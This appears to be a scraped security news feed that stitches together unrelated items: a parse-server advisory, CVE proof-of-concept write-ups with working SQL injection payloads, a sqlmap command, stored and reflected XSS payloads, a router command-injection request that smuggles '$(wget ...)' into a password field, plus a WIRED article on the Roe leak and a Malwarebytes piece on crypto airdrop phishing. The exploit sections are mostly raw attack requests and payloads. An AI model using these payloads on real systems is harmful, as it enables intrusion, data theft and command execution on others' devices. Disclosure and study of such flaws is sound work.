Weak validation of the Apple certificate URL in the Apple Game Center authentication adapter allows to bypass authentication and makes the server vulnerable to DoS attacks. The vulnerability has been fixed by improving the URL validation and adding additional checks of the resource the URL points to before downloading it.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-24901

**Authentication bypass and denial of service (DoS) vulnerabilities in Apple Game Center auth adapter**

High severity GitHub Reviewed Published May 4, 2022 in parse-community/parse-server • Updated May 13, 2022

Vulnerability details Dependabot alerts 0

**Package**

npm parse-server (npm )

**Affected versions**

< 4.10.10

\>= 5.0.0, < 5.2.1

**Patched versions**

4.10.10

5.2.1

**Description**

Weak validation of the Apple certificate URL in the Apple Game Center authentication adapter allows to bypass authentication and makes the server vulnerable to DoS attacks. The vulnerability has been fixed by improving the URL validation and adding additional checks of the resource the URL points to before downloading it.

**References**

*   GHSA-qf8x-vqjv-92gr
*   https://nvd.nist.gov/vuln/detail/CVE-2022-24901
*   parse-community/parse-server@af4a041

 mtrezza published the maintainer security advisory

May 1, 2022

**Severity**

High

7.5

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

None

Integrity

None

Availability

High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**Weaknesses**

CWE-287 CWE-295

**CVE ID**

CVE-2022-24901

**GHSA ID**

GHSA-qf8x-vqjv-92gr

**Source code**

parse-community/parse-server/

**Credits**

*    yoshmidev
*    kurt-r2c

This advisory has been edited. See History.

See something to contribute? Suggest improvements for this vulnerability.

GHSA-qf8x-vqjv-92gr: Authentication bypass and denial of service (DoS) vulnerabilities in Apple Game Center auth adapter 

In H3C MagicR100 <=V100R005, the / Ajax / ajaxget interface can be accessed without authorization. It sends a large amount of data through ajaxmsg to carry out DOS attack.

CVE-2022-28940: 0day/新华三magicR100存在DOS攻击漏洞分析.md at main · zhefox/0day

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.

****Hospital-Management-System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is admin.php

http://you ip/HMS/admin.php

Hospital-Management-System v1.0

The adminname parameter in the admin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python3 sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: adminname ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: adminname=admin' AND EXTRACTVALUE(4756,CONCAT(0x5c,0x717a706a71,(SELECT (ELT(4756=4756,1))),0x7170707a71)) AND 'hOiE'='hOiE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=admin' AND (SELECT 3117 FROM (SELECT(SLEEP(5)))xtHJ) AND 'beHE'='beHE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    ---
    

\[+\]Post request package

    POST /HMS/admin.php HTTP/1.1
    Host: 192.168.10.7
    Content-Length: 119
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.10.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.10.7/HMS/admin.php
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    adminname=admin1&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
    

**In action:**

**Proof and Exploit:**

href

CVE-2022-27413: GitHub - HH1F/Hospital-Management-System-V1.0-SQLi

A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_product of E-Commerce Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Title text field.

**Full-Ecommece-Website-Add\_Product-Stored\_XSS-POC**

*   Note => Login to admin
*   Description => Stored\_XSS at Product Title

**Step to Reproduct**

*   Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

**Exploit**

**Vulnerable Code**

 

*   When inserting into the database, the input is not filtered out characters

**POC**

*   Injection Point

\------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>

*   Request

POST /Full-Ecommece-Website/Codes/public/admin/index.php?add\_product HTTP/1.1
Host: localhost:8080
Content-Length: 1354971
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add\_product
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk\_uuid\_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0
Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_description"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_price"

10000
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="short\_desc"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="publish"

Publish
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_category\_id"

12
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_quantity"

1
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="file"; filename="car.png"
Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

CVE-2022-27330: GitHub - CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

The leak of a draft opinion overturning Roe v. Wade quickly sparked a court investigation. Which laws may have been violated, if any, remains uncertain.

The leak of a seismic draft opinion from the US Supreme Court that would overturn _Roe v. Wade_ has somehow managed overnight to elicit roughly equal outpourings of anger from the right and left: The left has rallied to decry a decision that would overturn a 50-year-old cornerstone of reproductive rights. Conservatives, despite the historic victory the ruling would represent for their side, have meanwhile targeted their political outrage at a far more specific individual: the leaker.

Just hours after Politico published a draft of the majority ruling written by Justice Samuel Alito calling the _Roe_ decision "egregiously wrong from the start" and overruling that five-decade-old precedent, figures across the right issued a chorus of calls for the investigation and prosecution of the anonymous source of the "illegal" leak. CBS News went so far as to report—somewhat vaguely—that it expects an investigation “involving the FBI” into the leak's source. And Chief Justice John Roberts has opened an investigation into the disclosure.

But all of that furor is undermined by an inconvenient legal truth: Leaking a Supreme Court decision doesn't actually seem to be a crime—at least not by any clear and undisputed definition. "Right now, it's unclear whether the leaker broke any law at all," says Trevor Timm, a First Amendment–focused lawyer and the executive director of the Freedom of the Press Foundation. "Even the people claiming this act is beyond the pale and the FBI must investigate haven't pointed to a definitive law this leaker allegedly broke."

Timm cites a lengthy Twitter thread published late Monday by the well-known UC Berkeley legal scholar Orin Kerr, who responded to the leak Monday night by pointing out that a Supreme Court draft doesn't meet any of the obvious criteria that would make it an illegal document to hand to a journalist: Most important, it's not classified, so leaking it doesn't open the leaker to prosecution under the Espionage Act. "As far as I can tell, there is no federal criminal law that directly prohibits disclosure of a draft legal opinion," Kerr concluded.

Of course, if the source is someone who hacked into a computer of, say, a Supreme Court justice or law clerk—or swiped the paper off their desk—the leaker could be prosecuted with computer fraud and abuse or theft, Kerr points out. But otherwise, despite the historical rarity of Supreme Court leaks and the politically radioactive nature of this one, Kerr argues there's no slam-dunk argument to federally prosecute the leaker.

Instead, Kerr suggests that any federal prosecutor seeking to make a case against Politico's leaker might have to resort to a far shakier statute, known as 18 U.S.C. § 641. That broad statute forbids the theft or misuse of government-owned "things of value"—a broadly written law seemingly designed at a surface level to prevent embezzlement or graft by those with access to the government's property. But whether it applies to information—and what kind of information, given to whom—remains an open question in federal law, with different circuit courts fundamentally disagreeing in their rulings.

"Legal scholarship provides little clarity regarding § 641’s interpretation; only a few scholars have even recognized § 641’s application to information," reads a _Columbia Law Review_ article about the statute's use for prosecuting leakers, written by Jessica Lutkenhaus, an attorney focused on criminal defense at the law firm Wilmer Hale. "The circuits disagree about whether § 641 applies to information, and, if it does, what its scope is: What information constitutes a 'thing of value'?"

Sharing information is arguably fundamentally different from stealing "a thing of value," Freedom of the Press Foundation's Timm points out. "You can't steal a government Jeep or take something tangible or physical from government offices," Timm says. "But copying something can be construed as different from stealing something. You copy it, and the original thing is still there, and you just leave with papers that didn't exist before."

That ambiguity has led different federal courts to come to contradictory conclusions. A Fourth Circuit court, for instance, found in 1991 that a Department of Defense employee who left the DOD for a job at a defense contractor and took information with him was guilty of violating § 641. But a Ninth Circuit court has come to an opposite conclusion, finding in a 1959 case that "intangible" goods are not covered by § 641. That ruling was later applied in 1988 by the same circuit to the case of an information leaker, a naval officer accused of stealing computer punch cards related to secret encryption information. The court confirmed that the information itself was not covered by § 641—though his appeal was thrown out anyway because he'd stolen the physical punch cards that stored it.

Other circuit courts have come to conclusions somewhere in between, with some finding, for instance, that the § 641 _does_ apply to information leaks but noting that this doesn't extend to those covered by the First Amendment's protections on free speech and freedom of the press—findings with direct relevance to Politico's Supreme Court leaker.

Several of the most notable leakers in history have been charged under 18 U.S.C. § 641, too, including Daniel Ellsberg, Chelsea Manning, and Edward Snowden. But the use of that law was overshadowed by their prosecution under the Espionage Act, since all three were accused of leaking classified secrets, and none set a clear precedent. Ellsberg's charges were dropped due to improper government conduct by the Nixon administration, and Snowden has yet to face trial. Manning was convicted on the 18 U.S.C. § 641 count she faced, but in a military court, not a civilian one.

All of that leaves the legal status of Politico's leaker—if they are identified—far from certain. But any confident argument that they committed a crime is on equally shaky terrain, argues Timm. And that's especially true in a case where the leaker appears to have leaked a document directly to the press, with a clear interest in making the information public.

"Even if prosecutors think 18 U.S.C. § 641 applies, I'd have serious First Amendment concerns with broadly applying it to anyone who leaks a government document to the press," Timm says. "Leaks to the press are as American as apple pie. And, in many cases throughout history, have furthered democracy rather than hindered it."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Is Leaking a SCOTUS Opinion a Crime? The Law Is Far From Clear

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

We take a look at the popular tactics used in Airdrop phishing to steal access to cryptocurrency users' digital finances.
The post Airdrop phishing: what is it, and how is my cryptocurrency at risk? appeared first on Malwarebytes Labs.

Airdrop phishing is a really popular tactic at the moment. It emerged alongside the explosion of Web3/NFT/cryptocurrency popularity, and ensures scammers get a slice of the money pie. You may well have heard the term in passing, and wondered what an Airdrop is. Is your iPhone about to be Airdrop phished?

It doesn’t really help that the term tied up into lots of new forms of tech you might never have experienced directly. It’s one of those odd scams, doing weird things, to accounts you have no idea about.

Fret no more, because we’re going to walk you through an actual Airdrop phish example. No apes were harmed in the making of this documentary.

**What is an Airdrop?**

Confusingly, the term has multiple uses jostling for attention. The older, more familiar term is the one related to Apple devices. An Apple Airdrop is where Bluetooth is used to send files to other people. If you’re not an Apple user, it’s likely you’ve only ever seen Airdrop in relation to trolling. If you’re out and about, you may walk into an unintended crossfire of memes, and in the worst case scenario, it might be objectionable unsolicited images.

In terms of security concerns specifically, research has shown how it could potentially aid spear phishing in the right circumstances. Crucially, none of these things are related to the Airdrops we’re talking about _today_.

**What type of Airdrop are we talking about?**

The Airdrops of the moment are promotional tactics aimed at cryptocurrency/Web3 people. Airdrops typically reward early adopters of certain currencies or communities. This type of reward can also be given out as no strings attached freebies to anyone who wants in on the action, and they’re great ways to keep people emotionally invested in their Web3 activities. There’s a lot of real world examples listed here.

In terms of how you _receive_ the Airdrop, there are a few different ways. Those early adopters may find the free Airdrop distributed to their address automatically, assuming they have some level of investment in the service giving it away. A big red flag is when a supposed Airdrop asks for funds (for a freebie?), or even worse, your login/recovery phrase.

Nobody should _ever_ be asking for that.

Airdrops are very popular, and this is where phishing attacks come in.

**Common Airdrop phishing tactics**

Airdrop phish pages try to ensnare as many cryptocurrency users as possible. No matter how obscure your digital currency of choice is, or how unusual your wallet is, there’s a scam just waiting for you.

Our bogus site below is quite slick looking, complete with ticker at the top. “Claim reward bonus/Airdrop”, they implore.

_An Airdrop phish_

Hitting the button takes you to the select a wallet page. There is, quite simply, a ridiculous amount of wallets and services listed. MetaMask, Solflare, Binance, Digitex, Argent, the works. If you use any form of cryptocurrency wallet or service, there’s a good chance it’s on the list somewhere.

_Wallets galore_

Clicking any of the wallets results in you being informed that an error has occurred. Connecting manually is what you’re now asked to do. From here, you’re asked to send them your phrase, private key, or keystore.

Hitting connect pauses the site for a second, then dumps you onto a 404 Page not found containing “sent” in the URL. At this point, it’s probably a good idea to hope the 404 is genuine and nothing has been sent to the scammers.

Some sites target users of one wallet only. Here’s one targeting MetaMask users, asking for their recovery phrase:

_“Type your secret phrase…”_

As MetaMask’s official support says:

> To get support, open MetaMask and navigate to “Support” or “Get Help” within the dropdown menu. Do not trust anyone who has sent you a direct message. UNDER NO CIRCUMSTANCES should you ever give your Secret Recovery Phrase to anyone or input it into any site!
> 
> — MetaMask Support (@MetaMaskSupport) April 29, 2022

****The ape themed Airdrop phish****

Apes are, of course, the hottest draw in town where Airdrop phishing is concerned. Just recently, close to $3m worth of Ape NFTs were stolen via an Instagram compromise. Anything ape related is a giant dollar sign in the sky for fraudsters, and the variety of fake pages out there reflects this.

_All my apes soon to be gone_

This particular site asked visitors to claim up to 10 Bull & Ape NFTs, then asked for a variety of password/recovery phrases. The supposed T&C page leads to a 404, and the cookies and privacy policy pages go to pages from an unrelated wallet app. Does this _really_ sound like something you want to hand over your recovery phrase to?

**The “Connect your wallet” Airdrop phish**

This is where a scam site checks to see if you have a wallet installed, and if not, tells you to install one and then connect it to the site.

Here’s an account with 60k followers, claiming to be the Moonbirds project offering up an NFT airdrop:

_A fake Twitter account offering up bogus airdrops_

When people started calling out the tweet, they locked people’s ability to reply under the guise of “safety” so nobody else could highlight the scam.

_“We are worried about your safety…”_

This is the genuine Moonbirds account. Note the verified status, which the imposter lacks:

Below, you can see my already installed MetaMask extension opening in the top right corner when I click the “Connect Wallet” button on the fake Airdrop page.

_Connecting an extension to a scam site_

Connecting your wallet to Decentralised Applications (Dapps) is common. What you need to be careful of is connecting to rogue sites. If you start granting permissions, or signing transactions, you may find your wallet draining of funds. It’s up to you to ensure that you don’t simply say “yes” to everything a site asks you. From the MetaMask FAQ:

> _Be careful about which Dapps you connect to, and what permissions you give them._ 
> 
> _Certain types of transaction require granting a Dapp permission to access your funds–infinite amounts of your funds._
> 
> _In fact, there have been cases of Dapps being created specifically with the intent to defraud users and steal all of their funds once they’ve granted this kind of access._

**Where Airdrops are concerned: safety first, every single time**

Nobody needs the stress of losing all their digital currency because of phishing, no matter which form it arrives in. Whether it’s websites asking for recovery phrases or Dapp style sites connecting wallets, be very careful what you do with your wallet. You almost certainly won’t get a second chance if things go wrong.

Airdrop phishing: what is it, and how is my cryptocurrency at risk?

MCMS v5.2.27 was discovered to contain a SQL injection vulnerability in the orderBy parameter at /dict/list.do.

A suspicious point was found in the IDictDao.xml file in the lib,ms-mdiy-2.1.12  
.net.mingsoft.mdiy.dao.IDictDao.xml#145  

Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in net.mingsoft.mdiy.action.DictAction and found a call to

net.mingsoft.mdiy.biz.dictBiz#query  

we can know that the suspicious injection point is orderBy, and then try to inject

    
    GET /ms/mdiy/dict/list.do?pageNo=1&pageSize=22&orderBy=1/**/or/**/updatexml(1,concat(0x7e,user(),0x7e),1)/**/or/**/1 HTTP/1.1
    Host: 10.28.246.83:8080
    Content-Length: 0
    Pragma: no-cache
    Accept: application/json, text/plain, */*
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Origin: http://10.28.246.83:8080
    Referer: http://10.28.246.83:8080/ms/mdiy/dict/index.do?
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=AAF6841C2E815174E1AF5498DBEDD12F; rememberMe=d56VV14gjxKRUu7SYYOTuOS8X48lfVhblbN4aL/wCBkaL805vU01qmEfZCk2PpqohqQ4bUuxyGvEzVrXqlVgeKFxrQHcgxhKPbzopVs4p5ftVg3+jnz3WkOHLrycrJKOVR+peOYM+3bbysPywLp/w/PGdFU0+ooXhCJbO8qMeXvR6U6RSTOOnvBq/P9ySYdwnqt0uIywoCNv8hE6gAgnhZUt4PBYLlZ4EekzFyLDqKJXJ5sOUuzR8/fPGjOoVzMydW3EIFJ0f2i59RQJe4fsx6i1NlnR1C9muMEaDUqj70Ec+M50tjnStsJNPCrSYzl2+KMzPXpoBS1DWCpURi5/ZCBp/FahWwnJZ6cA0owYZC9dXNC1b1FQoC2fIO5SPcNtEyySdD6c6BnA9Leei5iYTEIkPKHIw1oQhF7voRadkfW40ZmdPUTot5Gd8g7pDqpNNd/sig45EQtGqeXWwP45T2BcE1OKkPC9D+ELtqQSzOWcu7GUQkJ7jsECXu+ghoq/uihlh5Xdx1a8H8hhznmpJJd3hK2W+fy1IBAiH4GzkhQbepycUPqxD0t+ufNTFN5B0upouiyMiHSLejjdIkCl325p4rLi8TchVRxsKS0/Z9PflifFvaauQoTalNDa+vZXYvBrnVjXyRl3cUn4HPzTPBVNpXqnHPxf1jNtxtJKL09szd3OMRABDyIvL+T0JHl8pskKjEo80luOEP5f+ta2TW1XutmZJupbr6d97mfeRE9GDIYWFuHafXkh5uSBTkauPpQA7x25vhs1BjU5OVZ2ipfcPvH6WaPCcBJYM8Vqyd6g+5mdpsw7Hb27LcGxFo9dE39pBNjy8+1q6QqIojSfTRLfz1f/wGKgdOqy3x9z2+0SYi+irxF52r7FQgBZtTcGUu+1WPJJQEmG3BnUAkI7hpG1BmmjeHjDRgnOvA+L1LugHVQUYNN/Z8XzahHcDkNHr54/WXeQP56p0LC/E/D+XMCOSxCYkYnZdboRABf4Hwj+THJSTp+ZRsFjrZt27WWhJtDfGTgahpJLPioFUT/3HCnZKz529Ia9R1dTMHaKlxYrxf04GvgNCiFmslLqZX+9RlZizYNXCLRKECj83ovRCFJP5Ofg9SK+fNKNruL4uW5U4B+vLEuLhxCv7BzGFpjjciIOh8z6ypCQJDkuYUv/rffs0F1ngGI8TdAKhFxMnVbyUplk0+cYVQaBx1JTablsA+VgSl8n8+qhDoNA44TBg4OsrTaSMhcCha5b7OwczozSFDvJOR15GXgIKbJOTGSAJ5JhFFeQhkmpVWOGC4d9KdmHl6KUIOyB8DtO2ZU/XpTPbvFQGLvyyo1t7dPrvzHqG9LYmoQAcye6278=
    Connection: close

CVE-2022-27466: MCMS 5.2.7 SQLI · Issue #90 · ming-soft/MCMS

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

Tag

#apple